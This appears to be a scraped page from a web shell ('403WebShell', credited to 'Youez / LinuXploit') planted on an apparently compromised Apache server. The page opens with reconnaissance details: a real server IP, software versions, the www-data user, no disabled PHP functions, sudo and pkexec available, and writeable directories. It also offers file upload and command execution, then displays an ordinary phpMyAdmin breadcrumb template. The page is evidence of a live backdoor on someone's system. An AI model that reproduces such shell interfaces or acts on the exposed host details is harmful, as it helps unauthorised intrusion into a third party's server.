Uname:Linux ip-11-115-0-196 6.8.0-1039-aws #41~22.04.1-Ubuntu SMP Thu Sep 11 10:54:48 UTC 2025 x86_64

403WebShell
403Webshell
Server IP : 13.126.101.145  /  Your IP : 216.73.216.63
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ip-11-115-0-196 6.8.0-1039-aws #41~22.04.1-Ubuntu SMP Thu Sep 11 10:54:48 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.3.17
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/phpmyadmin/templates/menu/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/phpmyadmin/templates/menu/breadcrumbs.twig
<div id="floating_menubar"></div>
<nav id="server-breadcrumb" aria-label="breadcrumb">
  <ol class="breadcrumb">
    <li class="breadcrumb-item">
      {{ show_icons('TabsMode') ? get_image('s_host') }}
      <a href="{{ url(server.url) }}" data-raw-text="{{ server.name }}">
        {% if show_text('TabsMode') %}{% trans 'Server:' %}{% endif %}
        {{ server.name }}
      </a>
    </li>

    {% if database is not empty %}
      <li class="breadcrumb-item">
        {{ show_icons('TabsMode') ? get_image('s_db') }}
        <a href="{{ url(database.url, {'db': database.name}) }}" data-raw-text="{{ database.name }}">
          {% if show_text('TabsMode') %}{% trans 'Database:' %}{% endif %}
          {{ database.name }}
        </a>
      </li>

      {% if table is not empty %}
        <li class="breadcrumb-item">
          {{ show_icons('TabsMode') ? get_image(table.is_view ? 'b_views' : 's_tbl') }}
          <a href="{{ url(table.url, {'db': database.name, 'table': table.name}) }}" data-raw-text="{{ table.name }}">
            {% if show_text('TabsMode') %}
              {% if table.is_view %}
                {% trans 'View:' %}
              {% else %}
                {% trans 'Table:' %}
              {% endif %}
            {% endif %}
            {{ table.name }}
          </a>
        </li>

        {% if table.comment is not empty %}
          <span class="breadcrumb-comment">“{{ table.comment }}”</span>
        {% endif %}
      {% elseif database.comment is not empty %}
        <span class="breadcrumb-comment">“{{ database.comment }}”</span>
      {% endif %}
    {% endif %}
  </ol>
</nav>

Youez - 2016 - github.com/yon3zu
LinuXploit